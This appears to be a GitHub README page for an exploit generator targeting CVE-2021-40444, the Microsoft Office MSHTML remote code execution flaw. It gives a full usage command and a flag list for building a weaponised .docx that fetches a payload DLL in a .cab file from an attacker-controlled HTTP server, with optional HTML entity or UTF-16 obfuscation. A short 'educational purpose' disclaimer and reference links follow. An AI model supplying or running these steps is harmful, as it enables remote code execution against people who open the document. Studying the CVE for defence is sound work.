Skip to content

Latest commit

 

History

History
62 lines (46 loc) · 2.36 KB

README.md

File metadata and controls

62 lines (46 loc) · 2.36 KB

CVE-2021-40444

Usage

Ensure to run setup.sh first as you will need few directories. Once you have run the script, you should be able to run gen.py with the example given:-

# Usage
python3 gen.py -d document/Sample.docx -p payload/payload.dll -i "http://10.10.10.10" -t html/template.html -c payload.cab -f nothing.inf -r Sample2.docx -obf 3

# Flag
-d -> Our .docx file that already been modified with Bitmap Object whether in header, document or footer
-i -> IP Address
-p -> Payload (.dll)
-t -> HTML File with Javascript
-r -> Rename the output of modified .docx 
-c -> Rename the output of patched .cab
-f -> Rename the output of .inf 
-obf -> Extra : Comes with 3 mode (HTML Entity, UTF-16BE or Both)
-v -> Increase output verbosity

Notes

  1. The location of http.server will be in web directory. This directory will have 3 files:-
  • .cab
  • .html
  • .docx

Without Verbose

without_verbose

With Verbose

with_verbose

Disclaimer

This repository is for educational purpose only and not intended to be used in the wild for bad intention. Any illegal use of this repo is strictly at your own responsibilty and risk.

References

  1. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444
  2. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40444
  3. https://github.com/klezVirus/CVE-2021-40444
  4. https://github.com/lockedbyte/CVE-2021-40444
  5. https://trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html
  6. https://tenable.com/blog/microsoft-s-september-2021-patch-tuesday-addresses-60-cves-cve-2021-40444
  7. https://news.sophos.com/en-us/2021/09/14/big-office-bug-squashed-for-september-2021s-patch-tuesday/
  8. https://huntress.com/blog/cybersecurity-advisory-hackers-are-exploiting-cve-2021-40444
  9. https://microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/
  10. https://xret2pwn.github.io/CVE-2021-40444-Analysis-and-Exploit/
  11. https://blog.sunggwanchoi.com/remote-template-injection/
  12. https://youtube.com/watch?v=dgdx3QqPCuA
  13. https://businessinsights.bitdefender.com/technical-advisory-zero-day-vulnerability-in-microsoft-mshtml-allows-remote-code-execution